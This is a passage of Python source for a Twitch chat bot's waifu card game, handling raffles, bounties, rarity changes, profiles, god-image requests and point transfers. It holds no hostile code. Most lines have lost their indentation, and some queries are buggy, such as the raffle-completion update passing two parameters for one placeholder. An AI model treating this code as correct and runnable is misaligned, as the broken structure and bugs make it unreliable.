"There is a raffle currently open. You are already at the limit of %d tickets." % (
raffle_info[3]), isWhisper)
else:
# raffle in process of drawing
if my_tickets is None:
self.message(channel,
"The current raffle is in the process of being drawn. Unfortunately, you didn't buy any tickets! Try again next raffle.")
else:
if my_tickets[2] != 0:
self.message(channel,
"The current raffle is in the process of being drawn. So far you have won %d minor prizes and a grand prize from your %d tickets!" % (
                                                         my_tickets[1] - 1, my_tickets[0]), isWhisper)
else:
self.message(channel,
"The current raffle is in the process of being drawn. So far, you have won %d minor prizes and no grand prize from your %d tickets." % (
                                                         my_tickets[1], my_tickets[0]), isWhisper)
return
subcmd = args[0].lower()
if subcmd == 'buy':
                    if raffle_info is None or raffle_info[1] != 'open':
                        self.message(channel,
                                     "Raffle ticket purchases aren't open right now. Use !raffle to check the overall status.",
                                     isWhisper)
return
if len(args) < 2:
self.message(channel, "Usage: !raffle buy <amount>", isWhisper)
return
try:
tickets = int(args[1])
assert tickets >= 0
except Exception:
self.message(channel, "Invalid amount of tickets specified.", isWhisper)
return
cur.execute(
"SELECT num_tickets, num_winners, won_grand FROM raffle_tickets WHERE raffleid = %s AND userid = %s",
[raffle_info[0], tags['user-id']])
my_tickets = cur.fetchone()
can_buy = raffle_info[3] if my_tickets is None else raffle_info[3] - my_tickets[0]
cost = tickets * raffle_info[2]
if tickets > can_buy:
if can_buy == 0:
self.message(channel,
"%s, you're already at the maximum of %d tickets for this raffle. Please wait for the drawing." % (
tags['display-name'], raffle_info[3]), isWhisper)
else:
self.message(channel,
"%s, you can only buy %d more tickets for this raffle. Please adjust your purchase." % (
tags['display-name'], can_buy), isWhisper)
return
if not hasPoints(tags['user-id'], cost):
self.message(channel, "%s, you don't have the %d points required to buy %d tickets." % (
tags['display-name'], cost, tickets), isWhisper)
return
# okay, buy the tickets
addPoints(tags['user-id'], -cost)
if my_tickets is None:
cur.execute(
"INSERT INTO raffle_tickets (raffleid, userid, num_tickets, created) VALUES(%s, %s, %s, %s)",
[raffle_info[0], tags['user-id'], tickets, current_milli_time()])
else:
cur.execute(
"UPDATE raffle_tickets SET num_tickets = num_tickets + %s, updated = %s WHERE raffleid = %s AND userid = %s",
[tickets, current_milli_time(), raffle_info[0], tags['user-id']])
self.message(channel, "%s, you successfully bought %d raffle tickets for %d points." % (
tags['display-name'], tickets, cost), isWhisper)
return
if sender not in superadmins:
self.message(channel, "Usage: !raffle / !raffle buy <amount>", isWhisper)
return
if subcmd == 'open':
if raffle_info is not None and raffle_info[1] != 'done':
self.message(channel, "There is already an incomplete raffle right now.", isWhisper)
return
if len(args) < 3:
self.message(channel, "Usage: !raffle open <points per ticket> <max tickets>", isWhisper)
return
try:
points_per_ticket = int(args[1])
max_tickets = int(args[2])
assert max_tickets > 0 and max_tickets < 100
assert points_per_ticket >= 100
except Exception:
self.message(channel,
"Invalid arguments. Usage: !raffle open <points per ticket> <max tickets>",
isWhisper)
return
# create a new raffle
cur.execute(
"INSERT INTO raffles (opened, creator, status, ticket_price, max_tickets) VALUES(%s, %s, 'open', %s, %s)",
[current_milli_time(), tags['user-id'], points_per_ticket, max_tickets])
self.message(channel, "Started a new raffle!", isWhisper)
return
if subcmd == 'close':
if raffle_info is None or raffle_info[1] != 'open':
self.message(channel, "There is not an open raffle right now.", isWhisper)
return
cur.execute("UPDATE raffles SET closed = %s, status = 'drawing' WHERE id = %s",
[current_milli_time(), raffle_info[0]])
self.message(channel, "Closed ticket purchases for the current raffle!", isWhisper)
return
if subcmd == 'complete':
if raffle_info is None or raffle_info[1] != 'drawing':
self.message(channel, "There is not a raffle in the process of drawing right now.",
isWhisper)
return
cur.execute("UPDATE raffles SET status = 'done' WHERE id = %s",
[current_milli_time(), raffle_info[0]])
self.message(channel, "Closed drawing for the current raffle!", isWhisper)
return
if subcmd == 'pick' or subcmd == 'draw':
if raffle_info is None or raffle_info[1] != 'drawing':
self.message(channel, "There is not a raffle in the process of drawing right now.",
isWhisper)
return
if len(args) < 2:
self.message(channel, "Usage: !raffle pick <amount of winners>", isWhisper)
return
winners = []
try:
num_winners = int(args[1])
assert num_winners > 0
except Exception:
self.message(channel, "Usage: !raffle pick <amount of winners>", isWhisper)
return
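                # Weighted draw: ORDER BY -LOG(1-RAND())/w ASC with w = (num_tickets -
                # num_winners) picks each holder with probability proportional to their
                # remaining non-winning tickets, since each key is an Exponential(w)
                # sample and the minimum of independent exponentials falls to holder i
                # with probability w_i / sum(w). Re-running the query after every draw
                # lets a holder win repeatedly, but never more often than they hold
                # tickets.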
for i in range(num_winners):
cur.execute(
"SELECT raffle_tickets.userid, users.name FROM raffle_tickets INNER JOIN users ON raffle_tickets.userid = users.id WHERE raffle_tickets.raffleid = %s AND raffle_tickets.num_winners < raffle_tickets.num_tickets ORDER BY -LOG(1-RAND())/(num_tickets - num_winners) LIMIT 1",
[raffle_info[0]])
winner = cur.fetchone()
if winner is None:
# completely out of non-winning tickets
break
# add their name to the winner list
winners.append(winner[1])
# update their ticket entry
cur.execute(
"UPDATE raffle_tickets SET num_winners = num_winners + 1, updated = %s WHERE raffleid = %s AND userid = %s",
[current_milli_time(), raffle_info[0], winner[0]])
if len(winners) == 0:
self.message(channel,
"Drew no new minor prize winners - the system is out of non-winning tickets!",
isWhisper)
elif len(winners) < num_winners:
self.message(channel, "Drew %d minor prize winners (truncated) - %s !" % (
len(winners), ", ".join(winners)), isWhisper)
else:
self.message(channel,
"Drew %d minor prize winners - %s !" % (len(winners), ", ".join(winners)),
isWhisper)
return
if subcmd == 'pickgrand' or subcmd == 'drawgrand':
if raffle_info is None or raffle_info[1] != 'drawing':
self.message(channel, "There is not a raffle in the process of drawing right now.",
isWhisper)
return
if len(args) >= 2:
self.message(channel, "!raffle drawgrand only draws one winner at once.", isWhisper)
return
cur.execute(
"SELECT raffle_tickets.userid, users.name FROM raffle_tickets INNER JOIN users ON raffle_tickets.userid = users.id WHERE raffle_tickets.raffleid = %s AND raffle_tickets.num_winners < raffle_tickets.num_tickets AND raffle_tickets.won_grand = 0 ORDER BY -LOG(1-RAND())/(num_tickets - num_winners) LIMIT 1",
[raffle_info[0]])
winner = cur.fetchone()
if winner is None:
# completely out of non-winning tickets
self.message(channel,
"Could not draw a new grand prize winner as there are no applicable users left!",
isWhisper)
return
# update their ticket entry
cur.execute(
"UPDATE raffle_tickets SET num_winners = num_winners + 1, won_grand = 1, updated = %s WHERE raffleid = %s AND userid = %s",
[current_milli_time(), raffle_info[0], winner[0]])
self.message(channel, "Drew a new grand prize winner: %s!" % winner[1])
return
if command == "bounty":
if len(args) == 0:
self.message(channel,
"Usage: !bounty <ID> <amount> / !bounty list / !bounty check <ID> / !bounty cancel <ID>",
isWhisper=isWhisper)
return
subcmd = args[0].lower()
# support !bounty ID amount to place an order
if subcmd not in ['check', 'place', 'add', 'list', 'cancel']:
args = ['place'] + args
subcmd = 'place'
if subcmd == "check":
if len(args) != 2:
self.message(channel, "Usage: !bounty check <ID>", isWhisper=isWhisper)
return
if infoCommandAvailable(tags['user-id'], sender, tags['display-name'], self, channel, isWhisper):
try:
waifu = getWaifuById(args[1])
assert waifu is not None
assert waifu['can_lookup'] == 1
if waifu['base_rarity'] >= int(config["numNormalRarities"]):
self.message(channel, "Bounties cannot be placed on special waifus.", isWhisper)
return
if sender not in superadmins:
useInfoCommand(tags['user-id'], sender, channel, isWhisper)
with db.cursor() as cur:
cur.execute(
"SELECT COUNT(*), COALESCE(MAX(amount), 0) FROM bounties WHERE waifuid = %s AND status='open'",
[waifu['id']])
allordersinfo = cur.fetchone()
if allordersinfo[0] == 0:
self.message(channel,
"[{id}] {name} has no bounties right now.".format(id=waifu['id'],
name=waifu['name']),
isWhisper)
return
cur.execute(
"SELECT amount FROM bounties WHERE userid = %s AND waifuid = %s AND status='open'",
[tags['user-id'], waifu['id']])
myorderinfo = cur.fetchone()
minfo = {"count": allordersinfo[0], "id": waifu['id'], "name": waifu['name'],
"highest": allordersinfo[1]}
if myorderinfo is not None:
minfo["mine"] = myorderinfo[0]
if myorderinfo[0] == allordersinfo[1]:
self.message(channel,
"There are currently {count} bounties for [{id}] {name}. You are the highest bidder at {highest} points.".format(
**minfo), isWhisper)
else:
self.message(channel,
"There are currently {count} bounties for [{id}] {name}. Your bid of {mine} points is lower than the highest bid of {highest} points.".format(
**minfo), isWhisper)
else:
self.message(channel,
"There are currently {count} bounties for [{id}] {name}. The highest bid is {highest} points. You don't have a bounty on this waifu right now.".format(
**minfo), isWhisper)
except Exception:
self.message(channel, "Invalid waifu ID.", isWhisper=isWhisper)
return
if subcmd == "list":
cur = db.cursor()
cur.execute(
"SELECT waifuid, amount, waifus.name FROM bounties JOIN waifus ON bounties.waifuid = waifus.id WHERE userid = %s AND status='open'",
[tags['user-id']])
buyorders = cur.fetchall()
cur.close()
if len(buyorders) == 0:
self.message(channel,
"%s, you don't have any bounties active right now!" % tags['display-name'],
isWhisper)
return
messages = ["%s, you have %d active bounties: " % (tags['display-name'], len(buyorders))]
for order in buyorders:
message = "[%d] %s for %d points; " % (order[0], order[2], order[1])
if len(message) + len(messages[-1]) > 400:
messages.append(message)
else:
messages[-1] += message
for message in messages:
self.message(channel, message, isWhisper)
return
if subcmd == "place" or subcmd == "add":
if len(args) < 3:
self.message(channel, "Usage: !bounty <ID> <amount>", isWhisper)
return
if not followsme(tags['user-id']):
self.message(channel,
"%s, you must follow the bot to use bounties so you can be sent a whisper if your order is filled." %
tags['display-name'], isWhisper)
return
try:
waifu = getWaifuById(args[1])
assert waifu is not None
assert waifu['can_lookup'] == 1
if waifu['base_rarity'] >= int(config["numNormalRarities"]):
self.message(channel, "Bounties cannot be placed on special waifus.", isWhisper)
return
amount = int(args[2])
# check for a current order
cur = db.cursor()
cur.execute(
"SELECT id, amount FROM bounties WHERE userid = %s AND waifuid = %s AND status='open'",
[tags['user-id'], waifu['id']])
myorderinfo = cur.fetchone()
if myorderinfo is not None and myorderinfo[1] == amount:
self.message(channel,
"%s, you already have a bounty in place for that waifu for that exact amount." %
tags['display-name'], isWhisper)
cur.close()
return
# check for affordability
old_bounty = 0 if myorderinfo is None else myorderinfo[1]
points_delta = amount if myorderinfo is None else amount - myorderinfo[1]
if points_delta > 0 and not hasPoints(tags['user-id'], points_delta):
if myorderinfo is None:
self.message(channel,
"%s, you don't have enough points to place a bounty with that amount." %
tags['display-name'], isWhisper)
else:
self.message(channel,
"%s, you don't have enough points to increase your bounty to that amount." %
tags['display-name'], isWhisper)
cur.close()
return
# check for hand space
if myorderinfo is None and currentCards(tags['user-id']) >= handLimit(tags['user-id']):
self.message(channel, "%s, you don't have a free hand space to make a new bounty!" % tags[
'display-name'], isWhisper)
cur.close()
return
# check the range
cur.execute(
"SELECT COALESCE(MAX(amount), 0) FROM bounties WHERE userid != %s AND waifuid = %s AND status = 'open'",
[tags['user-id'], waifu['id']])
highest_other_bid = cur.fetchone()[0]
de_value = int(config["rarity%dValue" % waifu['base_rarity']])
min_amount = int(config["rarity%dMinBounty" % waifu['base_rarity']])
rarity_cap = int(config["rarity%dMaxBounty" % waifu['base_rarity']])
max_amount = max(rarity_cap, highest_other_bid * 6 // 5)
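                    # Allowed range: [rarity minimum, max(rarity cap, 120% of the highest
                    # rival bid)], so a bidding war can climb past the static cap in 20%
                    # steps.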
if amount < min_amount or amount > max_amount:
self.message(channel,
"%s, your bounty for this waifu must fall between %d and %d points." % (
tags['display-name'], min_amount, max_amount), isWhisper)
cur.close()
return
# outbidding?
outbidding = highest_other_bid != 0 and amount > highest_other_bid and old_bounty < highest_other_bid
minimum_outbid = max(highest_other_bid // 20, 5)
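                    # An outbid must beat the highest rival bid by at least 5% (minimum 5
                    # points); the same buffer stops you from lowering your own bounty into
                    # the zone just above the next-highest bid.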
if outbidding:
if amount < highest_other_bid + minimum_outbid:
self.message(channel,
"%s, you must place a bounty of at least %d points to outbid the current highest bid of %d points." % (
tags['display-name'], highest_other_bid + minimum_outbid,
highest_other_bid), isWhisper)
cur.close()
return
elif amount < old_bounty and highest_other_bid + minimum_outbid > amount and amount > highest_other_bid:
self.message(channel,
"%s, the lowest you can reduce your bounty to is %d points due to the bid of %d points below it." % (
tags['display-name'], highest_other_bid + minimum_outbid,
                                         highest_other_bid), isWhisper)
cur.close()
return
# check for duplicate amount
cur.execute(
"SELECT COUNT(*) FROM bounties WHERE waifuid = %s AND status = 'open' AND amount = %s",
[waifu['id'], amount])
dupe_amt = cur.fetchone()[0]
if dupe_amt > 0:
self.message(channel,
"%s, someone else has already placed a bounty on that waifu for %d points. Choose another amount." % (
tags['display-name'], amount), isWhisper)
cur.close()
return
# actions that require confirmation first
if len(args) < 4 or args[3].lower() != 'yes':
# check for placing a bounty that has already been outbid
if highest_other_bid > amount:
msgargs = (tags['display-name'], highest_other_bid, waifu['id'], amount)
if myorderinfo is None:
self.message(channel,
'%s, are you sure you want to place a bounty for lower than the current highest bid (%d points)? Enter "!bounty %d %d yes" if you are sure.' % msgargs,
isWhisper)
else:
self.message(channel,
'%s, are you sure you want to change your bounty to a lower amount than the current other highest bid (%d points)? Enter "!bounty %d %d yes" if you are sure.' % msgargs,
isWhisper)
cur.close()
return
# check for placing a bounty above regular cap
if amount > rarity_cap:
amount_refund = (amount - rarity_cap) // 2 + rarity_cap
msgargs = (tags['display-name'], amount_refund, waifu['id'], amount)
self.message(channel,
'%s, are you sure you want to place a bounty above the normal cap for that waifu\'s rarity? If you cancel it, you will only receive %d points back unless a higher bounty than yours is filled. Enter "!bounty %d %d yes" if you are sure.' % msgargs,
isWhisper)
cur.close()
return
# if it passed all of those checks it should be good to go.
                    # when reducing a bounty from above the rarity cap, refund only half of the above-cap portion (mirrors the cancel penalty below)
if points_delta < 0 and old_bounty > rarity_cap:
change_above_cap = min(-points_delta, old_bounty - rarity_cap)
addPoints(tags['user-id'], change_above_cap // 2 + (-points_delta - change_above_cap))
else:
addPoints(tags['user-id'], -points_delta)
if myorderinfo is None:
cur.execute(
"INSERT INTO bounties (userid, waifuid, amount, status, created) VALUES(%s, %s, %s, 'open', %s)",
[tags['user-id'], waifu['id'], amount, current_milli_time()])
self.message(channel, "%s, you placed a new bounty on [%d] %s for %d points." % (
tags['display-name'], waifu['id'], waifu['name'], amount), isWhisper)
else:
cur.execute("UPDATE bounties SET amount = %s, updated = %s WHERE id = %s",
[amount, current_milli_time(), myorderinfo[0]])
self.message(channel, "%s, you updated your bounty on [%d] %s to %d points." % (
tags['display-name'], waifu['id'], waifu['name'], amount), isWhisper)
# outbid message?
if outbidding:
# attempt to whisper for outbid
cur.execute(
"SELECT users.name FROM bounties JOIN users ON bounties.userid=users.id WHERE bounties.waifuid = %s AND bounties.amount = %s AND bounties.status = 'open' LIMIT 1",
[waifu['id'], highest_other_bid])
other_bidder = cur.fetchone()
if other_bidder is not None:
self.message('#%s' % other_bidder[0],
"Your bounty on [%d] %s has been outbid. The new highest bounty is %d points." % (
waifu['id'], waifu['name'], amount), True)
cur.close()
return
            except Exception:
self.message(channel, "Usage: !bounty <ID> <amount>", isWhisper=isWhisper)
return
if subcmd == "cancel":
if len(args) != 2:
self.message(channel, "Usage: !bounty cancel <ID>", isWhisper=isWhisper)
return
try:
waifu = getWaifuById(args[1])
assert waifu is not None
assert waifu['can_lookup'] == 1
# check for a current order
cur = db.cursor()
cur.execute(
"SELECT id, amount, created, updated FROM bounties WHERE userid = %s AND waifuid = %s AND status='open'",
[tags['user-id'], waifu['id']])
myorderinfo = cur.fetchone()
                    if myorderinfo is not None:
                        # updated (or created, for never-updated bounties) anchors the free-cancel check below
                        bounty_time = myorderinfo[3] if myorderinfo[3] is not None else myorderinfo[2]
cur.execute("UPDATE bounties SET status = 'cancelled', updated = %s WHERE id = %s",
[current_milli_time(), myorderinfo[0]])
# penalise them?
rarity_cap = int(config["rarity%dMaxBounty" % waifu['base_rarity']])
# free cancel after direct outbid was met?
cur.execute(
"SELECT COUNT(*) FROM bounties WHERE waifuid = %s AND status='filled' AND updated > %s",
[waifu['id'], bounty_time])
free_cancel = cur.fetchone()[0] > 0
if myorderinfo[1] > rarity_cap and not free_cancel:
refund = (myorderinfo[1] - rarity_cap) // 2 + rarity_cap
addPoints(tags['user-id'], refund)
self.message(channel,
"%s, you cancelled your bounty for [%d] %s and received only %d points back since it was above cap." % (
tags['display-name'], waifu['id'], waifu['name'], refund), isWhisper)
else:
addPoints(tags['user-id'], myorderinfo[1])
self.message(channel,
"%s, you cancelled your bounty for [%d] %s and received your %d points back." % (
tags['display-name'], waifu['id'], waifu['name'], myorderinfo[1]),
isWhisper)
else:
self.message(channel,
"%s, you don't have an active bounty for that waifu!" % tags['display-name'],
isWhisper)
cur.close()
return
except Exception:
self.message(channel, "Usage: !bounty cancel <ID>", isWhisper=isWhisper)
return
if command == "raritychange" and sender in superadmins:
hasConfirmed = False
if len(args) > 0 and args[-1].lower() == "yes":
hasConfirmed = True
args = args[:-1]
if len(args) < 2:
self.message(channel, "Usage: !raritychange <ID> <rarity>", isWhisper)
return
try:
waifu = getWaifuById(args[0])
assert waifu is not None
rarity = parseRarity(args[1])
except Exception:
self.message(channel, "Usage: !raritychange <ID> <rarity>", isWhisper)
return
            if waifu['base_rarity'] >= int(config['numNormalRarities']):
self.message(channel, "You shouldn't be changing a special waifu into another rarity.", isWhisper)
return
if rarity == waifu['base_rarity']:
self.message(channel, "[%d] %s is already %s base rarity!" % (
waifu['id'], waifu['name'], config['rarity%dName' % rarity]), isWhisper)
return
if not hasConfirmed and rarity > waifu['base_rarity'] and waifu['base_rarity'] < int(config["numNormalRarities"]) - 1:
# check for promoted copies existing
with db.cursor() as cur:
cur.execute("SELECT COUNT(*) FROM cards WHERE waifuid = %s AND rarity BETWEEN %s AND %s", [waifu['id'], waifu['base_rarity'] + 1, int(config["numNormalRarities"]) - 1])
if cur.fetchone()[0] > 0:
self.message(channel, "WARNING: You are trying to increase the rarity of a card which people have already promoted. This may cause undesirable results. Append ' yes' to your command if you want to do this anyway.", isWhisper)
return
# okay, do it
with db.cursor() as cur:
if rarity < int(config['numNormalRarities']):
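                    # Clamp normal_weighting into the [min, max] band already present in
                    # the target rarity. The "(SELECT * FROM waifus) w1" derived tables
                    # work around MySQL error 1093, which forbids reading from the table
                    # being updated in the same statement.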
cur.execute("UPDATE waifus SET normal_weighting = LEAST(GREATEST(normal_weighting, (SELECT MIN(w1.normal_weighting) FROM (SELECT * FROM waifus) w1 WHERE w1.base_rarity = %s)), (SELECT MAX(w2.normal_weighting) FROM (SELECT * FROM waifus) w2 WHERE w2.base_rarity = %s)), base_rarity = %s WHERE id = %s", [rarity, rarity, rarity, waifu['id']])
else:
cur.execute("UPDATE waifus SET base_rarity = %s WHERE id = %s", [rarity, waifu['id']])
cur.execute("SELECT id, userid, boosterid FROM cards WHERE userid IS NOT NULL AND waifuid = %s AND rarity < %s", [waifu['id'], rarity])
for copy in cur.fetchall():
if rarity >= int(config['numNormalRarities']):
updateCard(copy[0], {"rarity": rarity})
else:
updateCard(copy[0], {"userid": None, "boosterid": None})
addCard(copy[1], waifu['id'], 'other', copy[2], rarity)
attemptPromotions(waifu['id'])
# cancel all bounties
cur.execute(
"SELECT bounties.userid, users.name, bounties.amount FROM bounties JOIN users ON bounties.userid = users.id WHERE bounties.waifuid = %s AND bounties.status = 'open'",
[waifu['id']])
bounties = cur.fetchall()
for bounty in bounties:
addPoints(bounty[0], bounty[2])
self.message('#%s' % bounty[1],
"Your bounty for [%d] %s has been cancelled due to its rarity changing. Your %d points have been refunded." % (
waifu['id'], waifu['name'], bounty[2]), True)
cur.execute(
"UPDATE bounties SET status='cancelled', updated=%s WHERE waifuid = %s AND status='open'",
[current_milli_time(), waifu['id']])
if rarity >= int(config["numNormalRarities"]):
cur.execute("UPDATE users SET favourite = 1 WHERE favourite = %s AND (SELECT COUNT(*) FROM cards WHERE cards.userid = users.id AND cards.boosterid IS NULL AND cards.waifuid = %s) = 0", [waifu['id']] * 2)
# done
self.message(channel, "Successfully changed [%d] %s's base rarity to %s." % (
waifu['id'], waifu['name'], config['rarity%dName' % rarity]), isWhisper)
return
if command == "profile":
if len(args) == 0:
self.message(channel, tags["display-name"] + ", your profile: " + config[
"siteHost"] + "/profile?user=" + str(sender), isWhisper)
return
elif args[0] == "favourite" or args[0] == "favorite":
            if len(args) < 2:
                self.message(channel, "Usage: !profile favourite <waifu ID>", isWhisper)
                return
            try:
                newFav = int(args[1])
            except ValueError:
                self.message(channel, args[1] + " is not a number. Please try again.", isWhisper)
                return
newFavW = getWaifuById(newFav)
if newFavW is None:
self.message(channel, "That Waifu doesn't exist! Try again!", isWhisper)
return
canLookup = newFavW["can_lookup"] == 1
hasOrIsLowRarity = False
if int(newFavW["base_rarity"]) > 7:
logger.debug(sender + " requested to set " + str(
newFav) + " as his new Favourite Waifu, which is promo or above. Checking if they have it...")
hand = getHand(tags["user-id"])
for w in hand:
if str(w["waifuid"]) == str(newFav):
hasOrIsLowRarity = True
break
else:
hasOrIsLowRarity = True
if not canLookup and not hasOrIsLowRarity:
self.message(channel, tags[
"display-name"] + ", sorry, but that Waifu doesn't exist. Try a different one!",
isWhisper)
return
elif newFavW["can_favourite"] == 0:
self.message(channel, "%s, sorry, but that Waifu can't be set as your favourite. Try a different one!" % tags['display-name'], isWhisper)
return
elif hasOrIsLowRarity:
self.message(channel, "Updated your favourite Waifu to be " + newFavW["name"] + "! naroDesu",
isWhisper)
setFavourite(tags["user-id"], newFav)
return
else:
self.message(channel, tags[
"display-name"] + ", sorry, but this Waifu is a Special or above, so you need to have it to set it as a favourite!",
isWhisper)
return
elif args[0] == "description":
newDesc = " ".join(args[1:])
logger.debug("New description: " + newDesc)
if len(newDesc) > 1023:
self.message(channel, "That description is too long. Please limit it to 1024 characters.",
isWhisper)
return
setDescription(tags["user-id"], newDesc)
self.message(channel, tags["display-name"] + ", successfully updated your profile description!",
                         isWhisper)
            return
if command == "fixwaifu":
self.message(channel,
"To submit changes/fixes for any waifu, please go to %s/fixes" % config["siteHost"],
isWhisper)
return
if command == "packspending":
packstats = getPackStats(tags["user-id"])
if len(packstats) == 0:
self.message(channel,
"%s, you haven't bought any boosters yet! Buy your first with !booster buy." %
tags['display-name'], isWhisper)
return
totalspending = getSpendings(tags['user-id'])
packstr = ", ".join("%dx %s" % (row[1], row[0]) for row in packstats)
self.message(channel, "%s, you have spent %d total points on the following packs: %s." % (
tags['display-name'], totalspending, packstr), isWhisper)
if checkHandUpgrade(tags["user-id"]):
self.message(channel, "... and this was enough to upgrade your hand to a new slot! naroYay",
isWhisper)
return
if command == "godimage":
canManageImages = sender in superadmins
godRarity = int(config["numNormalRarities"]) - 1
if len(args) < 1:
if canManageImages:
self.message(channel, "Usage: !godimage change / queue / check / accept / reject", isWhisper)
else:
self.message(channel, "Usage: !godimage change / list / cancel", isWhisper)
return
subcmd = args[0].lower()
if subcmd in ["change", "request"]:
if len(args) < 3:
self.message(channel, "Usage: !godimage change[global] <id> <link>", isWhisper)
return
hand = getHand(tags['user-id'])
try:
card = parseHandCardSpecifier(hand, args[1], godRarity)
except CardNotInHandException:
self.message(channel, "%s, you don't own that waifu/card or it isn't god rarity!" % tags['display-name'],
isWhisper)
return
except AmbiguousWaifuException:
self.message(channel,
"%s, you own more than one god card of waifu %s! Please specify a card ID instead. You can find card IDs using !checkhand" % (
tags['display-name'], args[1]), isWhisper)
return
except ValueError:
self.message(channel, "Only whole numbers/IDs please.", isWhisper)
return
with db.cursor() as cur:
if card["base_rarity"] == godRarity:
self.message(channel, "Base god rarity waifus cannot have their picture changed!", isWhisper)
return
cur.execute("SELECT COALESCE(MAX(created), 0) FROM godimage_requests WHERE state = 'accepted' AND cardid = %s", [card['cardid']])
lastRequest = cur.fetchone()[0]
cooldown = lastRequest + int(config["imageChangeCooldownDays"])*86400000 - current_milli_time()
if cooldown > 0:
datestring = formatTimeDelta(cooldown, False)
self.message(channel, "Sorry, that card has had its image changed too recently. Please try again in %s" % datestring, isWhisper)
return
try:
validateWaifuURL(args[2])
except ValueError as ex:
self.message(channel, "Invalid link specified. %s" % str(ex), isWhisper)
return
except Exception:
self.message(channel, "There was an unknown problem with the link you specified. Please try again later.", isWhisper)
return
# cancel any old pending requests for this card
cur.execute("UPDATE godimage_requests SET state = 'cancelled', updated = %s WHERE cardid = %s AND state = 'pending'", [current_milli_time(), card['cardid']])
# record a new request
insertArgs = [tags['user-id'], card['cardid'], args[2], current_milli_time()]
cur.execute("INSERT INTO godimage_requests (requesterid, cardid, image, state, created) VALUES(%s, %s, %s, 'pending', %s)", insertArgs)
# notify the discordhook of the new request
discordArgs = {"user": tags['display-name'], "waifuid": card['waifuid'], "cardid": card['cardid'], "name": card["name"], "image": args[2]}
discordbody = {
"username": "WTCG Admin",
"content" : "{user} requested an image change for [{waifuid}] {name} to <{image}>!\nUse `!godimage check {cardid}` in any chat to check it.".format(**discordArgs)
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "Your request has been placed. You will be notified when bot staff accept or decline it.", isWhisper)
return
elif subcmd == "list":
with db.cursor() as cur:
cur.execute("SELECT waifus.id, waifus.name FROM godimage_requests gr JOIN cards ON gr.cardid=cards.id JOIN waifus ON cards.waifuid = waifus.id WHERE gr.requesterid = %s AND gr.state = 'pending'", [tags['user-id']])
reqs = cur.fetchall()
if len(reqs) == 0:
self.message(channel, "You don't have any pending god image change requests.", isWhisper)
else:
reqList = ", ".join(["[%d] %s" % (req[0], req[1]) for req in reqs])
self.message(channel, "%s, you have pending image change requests for: %s." % (tags['display-name'], reqList), isWhisper)
return
elif subcmd == "cancel":
if len(args) < 2:
self.message(channel, "Usage: !godimage cancel <id>", isWhisper)
return
hand = getHand(tags['user-id'])
try:
card = parseHandCardSpecifier(hand, args[1], godRarity)
except CardNotInHandException:
self.message(channel, "%s, you don't own that waifu/card or it isn't god rarity!" % tags['display-name'],
isWhisper)
return
except AmbiguousWaifuException:
self.message(channel,
"%s, you own more than one god card of waifu %s! Please specify a card ID instead. You can find card IDs using !checkhand" % (
tags['display-name'], args[1]), isWhisper)
return
except ValueError:
self.message(channel, "Only whole numbers/IDs please.", isWhisper)
return
with db.cursor() as cur:
cur.execute("UPDATE godimage_requests SET state = 'cancelled', updated = %s WHERE cardid = %s AND state = 'pending'", [current_milli_time(), card['cardid']])
if cur.rowcount > 0:
# send discord notif
discordArgs = {"user": tags['display-name'], "id": card['waifuid'], "name": card["name"]}
discordbody = {
"username": "WTCG Admin",
"content" : "{user} cancelled their image change request for [{id}] {name}.".format(**discordArgs)
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "You cancelled your image change request for [%d] %s." % (card['waifuid'], card["name"]), isWhisper)
else:
self.message(channel, "You didn't have a pending image change request for that waifu.", isWhisper)
return
elif subcmd == "queue" and canManageImages:
with db.cursor() as cur:
cur.execute("SELECT cardid FROM godimage_requests WHERE state = 'pending' ORDER BY created ASC")
queue = cur.fetchall()
if len(queue) == 0:
self.message(channel, "The request queue is currently empty.", isWhisper)
else:
queueStr = ", ".join(str(item[0]) for item in queue)
self.message(channel, "Current requested IDs for image changes: %s. !godimage check <id> to see each request." % queueStr, isWhisper)
return
elif canManageImages and subcmd in ["check", "acceptsingle", "accept", "reject"]:
if len(args) < 2:
self.message(channel, "Usage: !godimage %s <card id>" % subcmd, isWhisper)
return
try:
cardid = int(args[1])
except ValueError:
self.message(channel, "Usage: !godimage %s <card id>" % subcmd, isWhisper)
return
with db.cursor() as cur:
cur.execute("SELECT gr.id, gr.image, users.id, users.name, waifus.id, waifus.name, cards.id FROM godimage_requests gr"
+ " JOIN cards ON gr.cardid = cards.id"
+ " JOIN users ON gr.requesterid = users.id"
+ " JOIN waifus ON cards.waifuid = waifus.id"
+ " WHERE gr.cardid = %s AND gr.state = 'pending'", [cardid])
request = cur.fetchone()
if request is None:
self.message(channel, "There is no pending request for that card.", isWhisper)
return
if subcmd == "check":
msgArgs = {"user": request[3], "waifuid": request[4], "name": request[5], "image": request[1], "cardid": request[6]}
self.message(channel, ("{user} requested their copy of [{waifuid}] {name}'s image to be changed to {image} ." +
" You can accept this request with !godimage accept {cardid}" +
" or deny it with !godimage reject {cardid} <reason>.").format(**msgArgs), isWhisper)
elif subcmd == "reject":
if len(args) < 3:
self.message(channel, "You must provide a reason to reject the request. If it is porn/illegal/etc, just ban the user.", isWhisper)
return
rejectionReason = " ".join(args[2:])
queryArgs = [tags['user-id'], current_milli_time(), rejectionReason, request[0]]
cur.execute("UPDATE godimage_requests SET state = 'rejected', moderatorid = %s, updated = %s, rejection_reason = %s WHERE id = %s", queryArgs)
# notify them
self.message("#%s" % request[3], "Your image change request for [%d] %s was rejected with the following reason: %s" % (request[4], request[5], rejectionReason), True)
self.message(channel, "Request rejected and user notified.", isWhisper)
else:
# update it
try:
hostedURL = processWaifuURL(request[1])
except Exception as ex:
self.message(channel, "Could not process image. %s. Check the URL yourself and if it is invalid reject their request." % str(ex), isWhisper)
return
updateCard(request[6], {"customImage": hostedURL})
queryArgs = [tags['user-id'], current_milli_time(), request[0]]
cur.execute("UPDATE godimage_requests SET state = 'accepted', moderatorid = %s, updated = %s WHERE id = %s", queryArgs)
# notify them
self.message("#%s" % request[3], "Your image change request for your copy of [%d] %s was accepted." % (request[4], request[5]), True)
self.message(channel, "Request accepted. The new image for %s's copy of [%d] %s is %s" % (request[3], request[4], request[5], hostedURL), isWhisper)
return
if command == "sendpoints":
# expire old points transfers
with db.cursor(pymysql.cursors.DictCursor) as cur:
cur.execute("UPDATE points_transfers SET status = 'expired' WHERE status = 'pending' AND created <= %s", [current_milli_time() - int(config["pointsTransferExpiryMinutes"])*60000])
if len(args) < 2:
